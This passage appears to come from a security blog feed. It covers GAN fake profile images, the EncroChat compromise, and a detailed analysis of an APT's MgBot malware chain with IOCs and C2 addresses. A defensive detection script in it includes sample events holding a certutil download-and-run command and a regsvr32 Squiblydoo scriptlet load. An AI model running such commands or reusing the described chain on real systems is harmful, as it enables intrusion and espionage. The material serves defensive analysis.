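    for marker, payload, raw in iter_segments(data):
        if not (marker == APP1 and payload.startswith(EXIF_HEADER)):
            out += raw
    return bytes(out)


def build_sample_jpeg(with_gps: bool) -> bytes:
    """Constructed skeleton for the demo (not a decodable picture): SOI, Exif
    APP1 with a little-endian IFD0, a dummy DQT, SOS, fake scan bytes, EOI."""
    entries = [struct.pack("<HHII", MAKE_TAG, 2, 4, 0)]              # ASCII, placeholder offset
    if with_gps:
        entries.append(struct.pack("<HHII", GPS_IFD_TAG, 4, 1, 50))  # LONG, placeholder offset
    ifd0 = struct.pack("<H", len(entries)) + b"".join(entries) + struct.pack("<I", 0)
    tiff = b"II" + struct.pack("<HI", 42, 8) + ifd0
    payload = EXIF_HEADER + tiff
    app1 = b"\xff\xe1" + struct.pack(">H", len(payload) + 2) + payload
    dqt = b"\xff\xdb" + struct.pack(">H", 4) + b"\x00\x01"
    sos = b"\xff\xda" + struct.pack(">H", 4) + b"\x01\x00"
    return SOI + app1 + dqt + sos + b"\x12\x34\x56" + b"\xff\xd9"


if __name__ == "__main__":
    sample = build_sample_jpeg(with_gps=True)
    print("GPS pointer present:", has_gps_data(sample))       # True
    print("after strip:", has_gps_data(strip_exif(sample)))    # False
```

On a real file, `strip_exif(open(path, "rb").read())` drops the whole Exif block (and with it any GPS IFD) while leaving the image data untouched.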

Image swiping: often an afterthought

Back in November 2019, I thought it would be amusing if the creators of “Katie Jones” had just lazily swiped an image from a face generation website, as opposed to agonising over the fake image details.

For our fictitious university student, it seems that the people behind it may well have done just that [1], [2]. The creator of the site the image was likely pulled from has said they’re looking to make their images no longer downloadable, and/or place people’s heads in front of a 100 percent identifiably fake background such as “space.” They also state that “true bad actors will reach for more sophisticated solutions,” but as we’ve now seen in two high-profile cases, bad actors with big platforms and influential reach are indeed just grabbing whatever fake image they desire.

This is probably because ultimately the image is just an afterthought; the cherry on an otherwise bulging propaganda cake.

Just roll with it

As we’ve seen, the image wasn’t tailor-made for this campaign. It almost certainly wasn’t at the forefront of the plan for whoever came up with it, and they weren’t mapping out their scheme for world domination starting with fake profile pics. It’s just there, and they needed one, and (it seems) they did indeed just grab one from a freely-available face generation website. It could just as easily have been a stolen stock model image, but that is of course somewhat easier to trace.

And that, my friends, is how we end up with yet another subtle use of synthetic technology whose presence may ultimately have not even mattered that much.

Are these even deepfakes?

An interesting question, and one that seems to pop up whenever a GAN-generated face is attached to dubious antics or an outright scam. Some would argue a static, totally synthetic image isn’t a deepfake because it’s a totally different kind of output.

To break this down:

  1. The more familiar type of deepfake, where you end up with a video of [movie star] saying something baffling or doing something salacious, is produced by feeding a tool multiple images of that person. This nudges the AI into making the [movie star] say the baffling thing, or perform actions in a clip they otherwise wouldn’t exist in. The incredibly commonplace porn deepfakes would be the best example of this.
  2. The image used for “Oliver Taylor” is a headshot sourced from a GAN which is fed lots of images of real people, in order to mash everything together in a way that spits out a passable image of a 100 percent fake human. He is absolutely the sum of his parts, but in a way which no longer resembles them.

So, when people say, “That’s not a deepfake,” they’re wanting to keep a firm split between “fake image or clip based on one person, generated from that same person” versus “fake image or clip based on multiple people, to create one totally new person.”

The other common negative mark set against calling synthetic GAN imagery deepfakes, is that the digital manipulations are not what make it effective. How can it be a deepfake if it wasn’t very good?

Call the witnesses to the stand

All valid points, but the counterpoints are also convincing.

If we’re going to dismiss their right to deepfake status because digital manipulations are not effective, then we’re going to end up with very few bona-fide deepfakes. The digital manipulations didn’t make it effective, because it wasn’t very good. By the same token, we’d never know if digital manipulations haven’t made a good one because we’d miss it entirely as it flies under the radar.

Even the best movie-based variants tend to contain some level of not-quite-rightness, and I have yet to place a bunch before me where I couldn’t spot at least nine out of 10 GAN fakes mixed in with real photos.

As interesting and as cool as the technology is, the output is still largely a bit of a mess. From experience, the combo of a trained eye and some of the detection tools out there make short work of the faker’s ambitions. The idea is to do just enough to push whatever fictional persona/intent attached to the image is over the line and make it all plausible—be it blogs, news articles, opinion pieces, bogus job posting, whatever. The digital fakery works best as an extra chugging away in the background. You don’t really want to draw attention to it as part of a larger operation.

Is this umbrella term a help or a hindrance?

As for keeping the tag “deepfake” away from fake GAN people, while I appreciate the difference in image output, I’m not 100 percent sure that this is necessarily helpful. The word deepfake is a portmanteau of “deep learning” and “fake.” Whether you end up with Nicolas Cage walking around in The Matrix, or you have a pretend face sourced from an image generation website, they’re both still fakes borne of some form of deep learning.

The eventual output is the same: a fake thing doing a fake thing, even if the path taken to get there is different. Some would argue this is a potentially needless and unnecessary split/removal of a catch-all definition which manages to helpfully and accurately apply to both above—and no doubt other—scenarios.

It would be interesting to know if there’s a consensus in the AI deep learning/GAN creation/analyst space on this. From my own experience talking to people in this area, the bag of opinions is as mixed as the quality from GAN outputs. Perhaps that’ll change in the future.

The future of fakery detection

I asked Munira Mustaffa, Security Analyst, if automated detection techniques would eventually surpass the naked eye forever:

I’ve been mulling over this question, and I’m not sure what else I could add. Yes, I think automated deepfake checking can probably make a better assessment than the human eye eventually. However, even if you have the perfect AI to detect them, human review will always be needed. I think context also matters in terms of your question. If we’re detecting deepfakes, what are we detecting against?

I think it’s also important to recognise that there is no settled definition for what is a deepfake. Some would argue that the term only applies to audio/videos, while photo manipulations are “cheapfakes”. Language is critical. Semantics aside, at most, people are playing around with deepfakes/cheapfakes to produce silly things via FaceApp. But the issue here is really not so much about deepfakes/cheapfakes, but it is the intent behind the use. Past uses have indicated how deepfakes have been employed to sway perception, like that Nancy Pelosi ‘dumbfake’ video.

At the end of the day, it doesn’t matter how sophisticated the detection software is if people are not going to be vigilant with vetting who they allow into their network or who is influencing their point of view. I think people are too focused on the concept that deepfakes’ applications are mainly for revenge porn and swaying voters. We have yet to see large scale ops employing them. However, as the recent Oliver Taylor case demonstrated to us, deepfake/cheapfake applications go beyond that.

There is a real potential danger that a good deepfake/cheapfake that is properly backstopped can be transformed into a believable and persuasive individual. This, of course, raises further worrying questions: what can we do to mitigate this without stifling voices that are already struggling to find a platform?

We’re deepfakes on the moon

We’re at a point where it could be argued deepfake videos are more interesting conceptually than in execution. MIT’s Centre for Advanced Virtuality has put together a rendition of the speech Richard Nixon was supposed to give if the moon landing ended in tragedy. It is absolutely a chilling thing to watch; however, the actual clip itself is not the best technically.

The head does not play well with the light sources around it, the neckline of the shirt is all wrong against the jaw, and the voice has multiple digital oddities throughout. It also doesn’t help that they use his resignation speech for the body, as one has to wonder about the optics of shuffling papers as you announce astronauts have died horribly.

No, the interesting thing for me is deciding to show the deceptive nature of deepfakes by using a man who was born in 1913 and died 26 years ago. Does anyone under the age of 40 remember his look, the sound of his voice outside of parody and movies well enough to make a comparison? Or is the disassociation from a large chunk of collective memory the point? Does that make it more effective, or less?

I’m not sure, but it definitely adds weight to the idea that for now, deepfakes—whether video or static image—are more effective as small aspects of bigger disinformation campaigns than attention drawing pieces of digital trickery.

See you again in three months?

It’s inevitable we’ll have another tale before us soon enough, explaining how another ghostly entity has primed a fake ID long enough to drop their payload, or sow some discord at the highest levels. Remember that the fake imagery is merely one small stepping stone to an overall objective and not the end goal in and of itself. It’s a brave new world of disruption, and perhaps by the time you’re pulling up another chair, I might even be able to give you a definitive naming convention.

The post Deepfakes or not: new GAN image stirs up questions about digital fakery appeared first on Malwarebytes Labs.

EncroChat system eavesdropped on by law enforcement

Due to the level of sophistication of the attack, and the malware code, we can no longer guarantee the security of your device.

This text caused a lot of aggravation, worries, and sleepless nights. No one wants to hear the security of their device has been compromised by a malware attack. The good news is that the actual victims of this malware attack were almost exclusively criminals. The bad news is that the message was sent out by a provider called EncroChat, which had previously billed itself as private as an in-person conversation in a soundproof room.

EncroChat provides customers with secure messaging and cryptophones. Their cryptophones run on the OTR operating system. Short for Off-The-Record, OTR is a cryptographic protocol that provides both authentication and end-to-end encryption for instant messaging. This protocol ensures that session keys will not be compromised even if the private key of the server is compromised. Even when a server is seized, the conversations cannot be decrypted or lead back to the participants.

What happened to EncroChat?

EncroChat, a company based in the Netherlands, advertises their services as safer than safe, stating that no messages are saved on their servers, which are located “offshore.” But at some point, Dutch law enforcement figured out the EncroChat servers were located in France and got to work, hoping to catch criminals in the act.

Decryption specialists who had been involved in the Ennetcom (Canada) and PGP Safe (Costa Rica) cases were consulted and managed to access the EncroChat systems—their method of access is still unknown to the public. When asked how they managed to follow conversations on EncroChat, the Netherlands’ Team High Tech Crime chose not to answer. They may hope to use the method again in the future against another service.

Based on the information disclosed by EncroChat, it is likely that law enforcement agencies managed to install software on the servers that provided the phones with updates or delivered malware to the phones in another form. Either way, infecting devices allowed them to see the unencrypted messages. In essence, with enough infected devices, law enforcement was able to follow conversations in real time.

The warning that EncroChat sent out said:

They repurposed our domains to launch an attack to compromise carbon units. With control of our domain they managed to launch a malware campaign against the carbon to weaken its security.

Another clue supporting this takeaway was the fact that some users complained that the wipe function no longer worked, an indication that the malware was active at the device level.

What happened to EncroChat users?

Hundreds of arrests have already been made in the UK, the Netherlands, France, the Middle East, and a few other countries. On top of that, law enforcement has millions of chat messages that can lead to more arrests or serve as evidence in upcoming lawsuits. International drug traffickers have been hit especially hard by the service going bust.

But law enforcement’s move to access encrypted conversations sets up a dangerous precedent. Likely, the police had to act immediately on information that was potentially life threatening. However, without knowledge on how or why they breached the EncroChat system, their actions made encrypted chat users and operators suspicious about a possible leak. A criminal in the UK was confronted with an EncroChat message dating back to the end of 2019, so law enforcement agencies must have been monitoring the service for many months before users found out the system was compromised.

Why were so many criminals using EncroChat?

The EncroChat system was well organized and had gained a lot of trusting users over the years. Criminals felt secure enough to chat freely about everything: names of customers, drug deliveries, and even assassinations. And their trust was understandable, given what EncroChat had to offer:

  • Phones were dual boot, so users could alternatively start the Android operating system and their phones would look like a normal, old-fashioned model.
  • The phones had a “wipe all” button that would delete all the stored conversations in case of an arrest or other emergency.
  • No messages were stored on servers so they could not be seized and decrypted later.
  • OTR, unlike PGP, cannot be fully reconstructed even if you have both encryption keys.

EncroChat users paid hefty fees for this service—thousands of dollars per year, per device. The exorbitant fees may explain why the majority of the EncroChat clientele could be found on the wrong side of the law. Other parties that might have a vested interest in keeping their chat messages secret include government parties, journalists, security professionals, or lawyers. However, there are cheaper, if somewhat less sophisticated, alternatives for legitimate secret-keeping that law enforcement does not target.

After law enforcement agencies had taken down or compromised other providers, many European criminals flocked to EncroChat. An estimate by the French police indicated that 90 percent of the EncroChat users were engaged in criminal activity. However, of the 60,000 EncroChat end users, only 800 were arrested.

Encryption and law enforcement

Dutch law enforcement’s ability to breach EncroChat supports our point that the police don’t need built-in backdoors to catch criminals. Governments have asked for both means of observing data in transit, as well as retrieving data at rest on devices of interest. Looking at this case, we doubt that criminals would have chatted so freely about their activities had they known there was a backdoor—or even the capability of a backdoor—somewhere in the system.

But providing law enforcement with free access into platforms of their choosing is a slippery slope. For one, hacking into a secure platform puts all users’ information in jeopardy. Despite the intel on criminal activity in EncroChat, there are still legitimate users whose private messages are now compromised. In addition, where should law enforcement draw the line? How many other encryption platforms will they compromise before users have nowhere to turn? And at what point will law enforcement make an assumption of guilt just because someone is using encrypted chat?

Time and again law enforcement agencies have demonstrated that even if they can’t keep up with every new security development, at some point they catch up and find a way around it. And when they do, the harvest is huge. In this case, police departments will have years of investigating ahead of them if they plan to follow up on the millions of messages they intercepted. They may also find that because of their means of access, many data points may be inadmissible in court.

Thankfully, breaking encryption is not easy, especially when the encryption routine is without flaw. And these flaws will be a rare find when it comes to algorithms with track records like PGP and OTR. Finding a way to break the encryption will depend on a flaw in the implementation. Or finding a way to intercept messages before the encryption on the sender’s end or after the encryption on the receiver’s end.

Our hope is that law enforcement exhaust all other avenues of reconnaissance and investigation before moving to put the privacy of an entire platform of users in jeopardy. For now, legitimate users of end-to-end encryption programs needn’t worry about their company secrets or other confidential whisperings getting out. But for the potentially thousands of criminal EncroChat users that haven’t been arrested yet—time to worry.

The post EncroChat system eavesdropped on by law enforcement appeared first on Malwarebytes Labs.

Chinese APT group targets India and Hong Kong using new variant of MgBot malware

This blog post was authored by Hossein Jazi and Jérôme Segura

On July 2, we found an archive file with an embedded document pretending to be from the government of India. This file used template injection to drop a malicious template which loaded a variant of Cobalt Strike.

One day later, the same threat actor changed their template and dropped a loader called MgBot, executing and injecting its final payload through the use of Application Management (AppMgmt) Service on Windows.

On July 5, we observed yet another archive file with an embedded document borrowing a statement about Hong Kong from UK’s prime minister Boris Johnson. This document used the same TTPs to drop and execute the same payload.

Considering the ongoing tensions between India and China, as well as the new security laws over Hong Kong, we believe this new campaign is operated by a Chinese state-sponsored actor. Based on our analysis, we believe this may be a Chinese APT group that has been active since at least 2014.

Active targeting with different lures

We were able to track the activities of these threat actors over several days, based on unique phishing attempts designed to compromise their targets.

‘Mail security check’ with Cobalt Strike (variant 1)

This campaign was most likely carried out through spear phishing emails. The .rar file (Mail security check.rar) includes a document with the same name (Figure 1).

Figure 1: Mail security check.docx

The document uses template injection to download a remote template from the following URL (Figure 2).

Figure 2: Template injection

The downloaded template uses the dynamic data exchange (DDE) protocol to execute malicious commands, which are encoded within the document’s content (Figure 3).

Figure 3: Encoded command

After decoding, we can see the list of commands that will be executed by DDE:

Figure 4: Decoded commands

As Figure 4 shows, the threat actors used certutil with -urlcache -split -f parameters to download a com scriptlet from its server and then used the Squiblydoo technique to execute the downloaded scriptlet via regsvr32.exe on the victim machine.

This scriptlet is stored in the Documents directory as “ff.sct”. The scriptlet is an XML file with embedded VBScript (Figure 5).

Figure 5: ff.sct snippet

The scriptlet creates a VB macro and calls Excel to execute it. The macro has been obfuscated to bypass static security mechanisms and is responsible for injecting the embedded payload into rundll32.exe using the reflective DLL injection method. The injected payload is a variant of Cobalt Strike.

The following diagram shows the overall process of this attack:

Figure 6: Overall process

‘Mail security check’ with MgBot (variant 2)

As we mentioned earlier, a day after the first attack, the APT group changed its remote template. In this new variant, the actors stopped using the Squiblydoo technique and Cobalt Strike as a payload.

Figure 7 shows the new encoded commands embedded within the template file.

Figure 7: Encoded command

Figure 8 shows the list of commands that will be executed by DDE.

Figure 8: Decoded commands

In this new template file, the storm.sct scriptlet was replaced with storm.txt. Similar to the previous version, certutil is used to download the storm.txt file which is an executable stored in the Documents directory as ff.exe.

The following diagram shows the overall execution process:

Figure 9: Overall execution process

“Boris Johnson Pledges to Admit 3 Million From Hong Kong” with MgBot (variant 3)

The last document used by the Chinese APT group in this campaign focused on issues happening in Hong Kong. The file was embedded within an archive file named “Boris Johnson Pledges to Admit 3 Million From Hong Kong to U.K.rar”.

This document quotes the prime minister after a new security law was issued by China against Hong Kong (Figure 10).

Figure 10: Boris Johnson Pledges to Admit 3 Million From Hong Kong to U.K.

Similar to the other documents, it also uses template injection to download the remote template (Figure 11).

Figure 11: Remote template

The downloaded template (BNOHK.docx) is similar to ADIN.docx (variant 2) in that it uses DDE to download and drop its loader.

Payload analysis: MgBot (BLame, Mgmbot)

The dropped executable (ff.exe) is a new variant of a loader called MgBot that drops and loads the final payload. This loader pretends to be a Realtek Audio Manager tool (Figure 12).

Figure 12: File version information

It has four embedded resources, two of which are in the Chinese (Simplified) language. This is an indicator that suggests this campaign is likely operated by a Chinese APT group.

Figure 13: Resource language

The loader starts its process by escalating privilege through a UAC bypass using the CMSTPLUA COM interface.

MgBot uses several anti-analysis and anti-virtualization techniques. The code is self-modifying, which means it alters its code sections at runtime. This makes static analysis of the sample harder.

MgBot tries to avoid running in known virtualized environments such as VMware, Sandboxie and VirtualBox. To identify whether it’s running in one of these environments, it looks for the following DLL files: vmhgfs.dll, sbiedll.dll and vboxogl.dll. If it finds any of these DLLs, it enters an infinite loop without performing any malicious activity (Figure 14).

Figure 14: Anti-VMs

It also checks for the presence of security products on the victim’s machine and takes a different execution flow if a security product is detected. For example, it checks for zhudongfangyu.exe, 360sd.exe, 360Tray.exe, MfeAVSvc.exe and McUICnt.exe in different parts of the code (Figure 15). The malware does not perform all of these checks at once; rather, it checks a couple of them at different steps of its execution.

Figure 15: Security products checks

To invoke the required APIs, the malware does not call them directly but instead builds a function pointer table for the required APIs. Each request to an API call is made through the access to the relevant index of this table.

Figure 16: Building function pointer table

As an example, when the malware needs to invoke WinExec, it does so by invoking it through its index from the function pointer table.

Figure 17: Calling API through use of function pointer table

After building the required API calls table, the malware performs the following procedures:

  • It calls CreateFileW to create iot7D6E.tmp (a random name starting with iot) in the %APPDATA%\Temp directory. This tmp file is a CAB file that embeds the final payload.
  • It calls WriteFile to populate its content.
  • It calls CreateProcessInternalW to invoke expand.exe to decompress the content of iot7D6E.tmp into ProgramData\Microsoft\PlayReady\MSIBACF.tmp\tmp.dat (the MSIBACF.tmp directory name is generated randomly: it starts with MSI, followed by a combination of random numbers and characters).
Figure 18: Calling expand.exe
  • It calls CopyFileW to copy tmp.dat to pMsrvd.dll.
  • It calls DeleteFileW to delete tmp.dat.
  • It drops DBEngin.EXE and WUAUCTL.EXE in the ProgramData\Microsoft\PlayReady directory. Both files are copies of rundll32.exe, used later to execute the dropped DLL.
  • It modifies the registry hive at HKLM\SYSTEM\CurrentControlSet\Services\AppMgmt to make itself persistent. To perform this modification, it drops two registry files named iix*.tmp (random numbers appended to iix) into the %APPDATA%\Temp directory; these are the old and new registry hives for that registry location.

To load the dropped DLL (pMsrvd.dll) the loader registers it as a service. To achieve this, it makes use of the already installed service, AppMgmt, to load the payload as shown in the following images:

Figure 18: ServiceDll
Figure 19: ImagePath

Finally, it executes the dropped DLL by running net start AppMgmt. After loading the DLL, the loader creates a cmd file (lgt*.tmp.cmd) in the %APPDATA%\TEMP directory with the content shown in Figure 20. It then executes this file to delete both the cmd file and the loader from the victim’s machine.

Figure 20: cmd file

We were able to identify several different variants of this loader. In general, all the variants drop the final payload using expand.exe or extrac32.exe and then use “net start AppMgmt” or “net start StiSvc” to execute the dropped DLL with one of the following configurations:

  • svchost.exe -k netsvcs -p -s AppMgmt
  • svchost.exe -k netsvcs
  • svchost.exe -k imgsvc
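From the defender’s side, the loader chain described above (certutil download, Squiblydoo via regsvr32, CAB expansion of an iot*.tmp file, rundll32 copies under PlayReady, the AppMgmt ServiceDll change and the net start) is unusual enough to correlate. The following is an added example, not code from the article or from Malwarebytes: a small rule set run over constructed process-creation and registry events; the event layout, user name and download URL are assumptions for the demo.

```python
"""Added example (not from the article): a small rule set that scans
constructed process-creation and registry-modification events for the MgBot
loader chain described above. The event dictionaries and the user/host names
in them are assumptions for the demo, not a real sensor format."""
import re
from typing import Callable, Dict, List, Optional, Tuple

Event = Dict[str, str]


def _is_proc(e: Event, *images: str) -> bool:
    return e["type"] == "process" and e["image"].lower().endswith(images)


def certutil_download(e: Event) -> bool:
    """certutil -urlcache -split -f <url> <file>: the download step in Figures 4 and 8."""
    c = e.get("cmdline", "").lower().split()
    return _is_proc(e, "certutil.exe") and {"-urlcache", "-split", "-f"} <= set(c)


def squiblydoo(e: Event) -> bool:
    """regsvr32 loading a .sct scriptlet through scrobj.dll (variant 1)."""
    c = e.get("cmdline", "").lower()
    return _is_proc(e, "regsvr32.exe") and "scrobj.dll" in c and re.search(r"/i:\S+\.sct", c) is not None


def cab_expand_temp(e: Event) -> bool:
    """expand.exe / extrac32.exe unpacking an iot*.tmp CAB file from a Temp directory."""
    c = e.get("cmdline", "").lower()
    return _is_proc(e, "expand.exe", "extrac32.exe") and re.search(r"\\temp\\iot[0-9a-f]+\.tmp\b", c) is not None


def playready_rundll_copy(e: Event) -> bool:
    """The rundll32 copies DBEngin.EXE / WUAUCTL.EXE dropped under ProgramData\\Microsoft\\PlayReady."""
    img = e.get("image", "").lower()
    return e["type"] == "process" and "\\programdata\\microsoft\\playready\\" in img \
        and img.endswith(("\\dbengin.exe", "\\wuauctl.exe"))


def appmgmt_servicedll_hijack(e: Event) -> bool:
    """ServiceDll of the AppMgmt service pointed outside System32 (Figure 18).
    Assumption: ServiceDll lives under the service's Parameters subkey, as for svchost-hosted services."""
    if e["type"] != "registry":
        return False
    key, val = e["key"].lower(), e["value"].lower()
    return key.endswith("\\services\\appmgmt\\parameters\\servicedll") \
        and not val.startswith(("%systemroot%\\system32\\", "c:\\windows\\system32\\"))


def net_start_service(e: Event) -> bool:
    """net start AppMgmt / StiSvc: how the loader gets svchost to load the DLL."""
    c = e.get("cmdline", "").lower().split()
    return _is_proc(e, "net.exe", "net1.exe") and len(c) >= 3 and c[1] == "start" and c[2] in ("appmgmt", "stisvc")


# (stage, ATT&CK ID from the article's table where it lists one, predicate)
RULES: List[Tuple[str, Optional[str], Callable[[Event], bool]]] = [
    ("certutil download", "T1105", certutil_download),
    ("Squiblydoo via regsvr32", "T1218", squiblydoo),
    ("CAB expand of iot*.tmp", None, cab_expand_temp),
    ("rundll32 copy in PlayReady", "T1085", playready_rundll_copy),
    ("AppMgmt ServiceDll hijack", "T1031", appmgmt_servicedll_hijack),
    ("net start AppMgmt/StiSvc", "T1035", net_start_service),
]


def analyze(events: List[Event]) -> List[Tuple[int, str, Optional[str]]]:
    """Return (event index, stage, technique) for every rule hit."""
    return [(i, stage, tid) for i, e in enumerate(events)
            for stage, tid, pred in RULES if pred(e)]


def is_mgbot_like(events: List[Event], min_stages: int = 3) -> bool:
    """Any single hit is noisy on its own; several distinct stages on one host are not."""
    return len({stage for _, stage, _ in analyze(events)}) >= min_stages


# Constructed sample events modelled on the chain in the article (URL and user are placeholders).
SAMPLE_EVENTS: List[Event] = [
    {"type": "process", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -urlcache -split -f http://example.invalid/storm.txt C:\Users\u\Documents\ff.exe"},
    {"type": "process", "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32.exe /s /n /u /i:C:\Users\u\Documents\ff.sct scrobj.dll"},
    {"type": "process", "image": r"C:\Windows\System32\expand.exe",
     "cmdline": r"expand.exe C:\Users\u\AppData\Roaming\Temp\iot7D6E.tmp C:\ProgramData\Microsoft\PlayReady\MSIBACF.tmp\tmp.dat"},
    {"type": "process", "image": r"C:\ProgramData\Microsoft\PlayReady\WUAUCTL.EXE",
     "cmdline": r"WUAUCTL.EXE C:\ProgramData\Microsoft\PlayReady\pMsrvd.dll"},
    {"type": "registry", "key": r"HKLM\SYSTEM\CurrentControlSet\Services\AppMgmt\Parameters\ServiceDll",
     "value": r"C:\ProgramData\Microsoft\PlayReady\pMsrvd.dll"},
    {"type": "process", "image": r"C:\Windows\System32\net.exe", "cmdline": "net.exe start AppMgmt"},
    # benign noise: hashing with certutil, and a ServiceDll that stays inside System32
    {"type": "process", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -hashfile C:\Users\u\setup.msi SHA256"},
    {"type": "registry", "key": r"HKLM\SYSTEM\CurrentControlSet\Services\AppMgmt\Parameters\ServiceDll",
     "value": r"%SystemRoot%\System32\appmgmts.dll"},
]

if __name__ == "__main__":
    for idx, stage, tid in analyze(SAMPLE_EVENTS):
        print(f"event {idx}: {stage} ({tid or 'no ID in table'})")
    print("MgBot-like chain:", is_mgbot_like(SAMPLE_EVENTS))   # True
```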

The dropped DLL is the main payload used by this threat actor to perform malicious activities. The following shows the file version information pretending to be a Video Team Desktop App.

Figure 21: File info

The creation time for this DLL appears to be “2008-04-26 16:41:12”. However, based on the Rich header data, we can infer that this timestamp may have been tampered with by the threat actor.

Figure 22: Rich header

The DLL has eight export functions with carefully selected names to pretend they are doing normal tasks. It can check the running services and based on that can inject itself into the memory space of WmiPrvSE.exe.

Figure 23: Injection into WmiPrvse.exe
Figure 24: RAT’s DLL is injected into memory space of WmiPrvse.exe

It uses several anti-debugging and anti-virtualization techniques to detect if it’s running in a virtualized environment or if it is being debugged by a debugger. It uses GetTickCount and QueryPerformanceCounter API calls to detect the debugger environment.

To detect whether it is running in a virtual environment, it uses anti-VM detection instructions such as sldt and cpuid, which provide information about the processor, and also checks the VMware I/O port backdoor (VMXh).

Figure 25: Environment Detection

All the strings used by this RAT are either obfuscated or XOR encoded to make its analysis hard.

This final piece of code bundled in MgBot is a Remote Administration Trojan with several capabilities such as:

  • C2 communication over TCP (42.99.116[.]225:12800)
  • Ability to take screenshots
  • Keylogging
  • File and directory management
  • Process management
  • Create MUTEX

Infrastructure relations

The following shows the infrastructure used by this APT and relations between hosts used by this group. This APT group has used several different IP addresses to host its malicious payloads and also for its C2 communications.

What is interesting is that the majority of IP addresses used by this APT are located in Hong Kong and almost all of these Hong Kong-based IP addresses are used for C2 communication. Even in their past campaigns they mostly have used infrastructure in Hong Kong. The graph also shows the relationship between different IP addresses used by this APT group.

Figure 26: Infrastructure connections

Android RAT

We also found several malicious Android applications we believe are part of the toolset used by this APT group. Malwarebytes detects them as Android/Trojan.Spy.AndroRat.KSRemote.

Figure 27: Malicious Android APK

All these bogus applications contain a jar file named ksremote.jar that provides the RAT functionality:

  • Recording screen and audio using the phone’s camera/mic
  • Locating phone with coordinates
  • Stealing phone contacts, call log, SMS, web history
  • Sending SMS messages
Figure 28: Contact grabbing capability

This RAT communicates with C&C servers using random port numbers within the 122.10.89.170 to 179 range (all in Hong Kong):

  • 122.10.89[.]172:10560
  • 122.10.89[.]170:9552
  • 122.10.89[.]172:10560

TTPs in line with Chinese APTs

The lures used in this campaign indicate that the threat actor may be targeting the Indian government and individuals in Hong Kong, or at least those who are against the new security law issued by China.

The TTPs observed in these attacks have been used by several Chinese APT groups:

  • Rancor APT is known to use certutil to download their payload.
  • KeyBoy is known to have used DDE in its previous campaigns.
  • APT40 has utilized Squiblydoo and template injection in its previous campaigns.

Considering these factors we attribute this APT attack with moderate confidence to a new Chinese APT group. Based on the TTPs used by this APT group we were able to track back its activities to at least 2014. In all their campaigns the actor has used a variant of MgBot.

A threat actor with a long documented history

A Needle in a haystack blog post from 2014 detailed a campaign that drops a Trojan disguised as a legitimate MP3 encoder library. In this campaign the actor used CVE-2012-0158 to drop its Trojan. The rest of the TTPs including the methods used by the threat actor to execute MgBot and registry modifications are similar to this ongoing campaign.

In 2018, this group performed another operation in which they used a VBScript vulnerability (CVE-2018-8174) to initiate their attack and drop a variant of MgBot. In March 2020, an archive file (warning.rar) was submitted to VirusTotal that we believe is part of another campaign run by this actor.

We will continue to monitor this group’s activities to see whether its targeting or techniques evolve. Malwarebytes users are protected from this campaign thanks to our signature-less anti-exploit layer.

Figure 29: Malwarebytes Nebula blocking malicious Word document

MITRE ATT&CK techniques

Tactic                ID     Name                            Details
Execution             T1059  Command-Line Interface          Starts CMD.EXE for command execution
                      T1106  Execution through Module Load   Loads dropped or rewritten executables: WUAUCTL.EXE, svchost.exe, rundll32.exe
                      T1085  Rundll32                        Uses RUNDLL32.EXE to load a library
                      T1064  Scripting                       WScript.exe; starts MSHTA.EXE to open HTA or HTML files
                      T1035  Service Execution               Starts NET.EXE for service management
                      T1170  Mshta                           Starts MSHTA.EXE to open HTA or HTML files
                      T1086  PowerShell                      Executes PowerShell scripts
Privilege Escalation  T1050  New Service                     Creates or modifies Windows services through rundll32.exe
                      T1088  Bypass User Account Control     Known privilege escalation technique through DllHost.exe
Persistence           T1031  Modify Existing Service         Creates or modifies Windows services through rundll32.exe
                      T1050  New Service                     Creates or modifies Windows services through rundll32.exe
Defense Evasion       T1107  File Deletion                   Starts CMD.EXE to delete itself
                      T1085  Rundll32                        Uses RUNDLL32.EXE to load a library
                      T1088  Bypass User Account Control     Known privilege escalation technique through DllHost.exe
                      T1497  Virtualization/Sandbox Evasion  The loader uses several anti-virtualization detection techniques
                      T1221  Template Injection              Maldoc uses template injection to download a remote template
                      T1218  Signed Binary Proxy Execution   Uses Squiblydoo to load an executable
Discovery             T1012  Query Registry                  Reads the machine GUID from the registry
                      T1082  System Information Discovery    Reads the machine GUID from the registry
                      T1007  System Service Discovery        Starts NET.EXE for service management
Lateral Movement      T1105  Remote File Copy                certutil.exe downloads executable files from the Internet; cmd.exe starts CertUtil to download files
Command and Control   T1105  Remote File Copy                certutil.exe downloads executable files from the Internet; cmd.exe starts CertUtil to download files
Table 1: MITRE ATT&CK TTPs

IOCs

2a5890aca37a83ca02c78f00f8056e20d9b73f0532007b270dbf99d5ade59e2a Boris Johnson Pledges to Admit 3 Million From Hong Kong to U.K.docx

fc885b50892fe0c27f797ba6670012cd3bbd5dc66f0eb8fdd1b5fca9f1ea98cc BNOHK.docx.zip

3b93bc1e0c73c70bc8f314f2f11a91cf5912dab4c3d34b185bd3f5e7dd0c0790 Boris_Johnson_Pledges_to_Admit_3_Million_From_Hong_Kong_to_U.K.rar

ecf63a9430a95c34f85c4a261691d23f5ac7993f9ac64b0a652110659995fc03 Email security check.rar

1e9c91e4125c60e5cc5c4c6ef8cbb94d7313e20b830a1e380d5d84b8592a7bb6 Email security check.docx

3a04c1bdce61d76ff1a4e1fd0c13da1975b04a6a08c27afdd5ce5c601d99a45b ADIN.docx (storm.sct)

855af291da8120a48b374708ef38393e7c944a8393880ef51352ce44e9648fd8 ADIN.docx (storm.sct)

1e81fb62cb57a3231642f66fee3e10d28a7c81637e4d6a03515f5b95654da585 ff.exe (storm.txt)

99aee7ae27476f057ef3131bb371a276f77a526bb1419bfab79a5fac0582b76a cobalt strike

flash.governmentmm[.]com: This domain is used by the actor to host remote templates. It was registered three months ago by someone in the United States.

MgBot samples

2310f3d779acdb4881b5014f4e57dd65b4d6638fd011ac73e90df729b58ae1e0
e224d730e66931069d6760f2cac97ab0f62d1ed4ddec8b58783237d3dcd59468
5b0c93a70032d80c1f5f61e586edde6360ad07b697021a83ed75481385f9f51f
1e81fb62cb57a3231642f66fee3e10d28a7c81637e4d6a03515f5b95654da585
07bb016c3fde6b777be4b43f293cacde2d3aae0d4e4caa15e7c66835e506964f
7bdfabdf9a96b3d941f90ec124836084827f6ef06fadf0dce1ae35c2361f1ac6
8ab344a1901d8129d99681ce33a76f7c64fd95c314ac7459c4b1527c3d968bb4
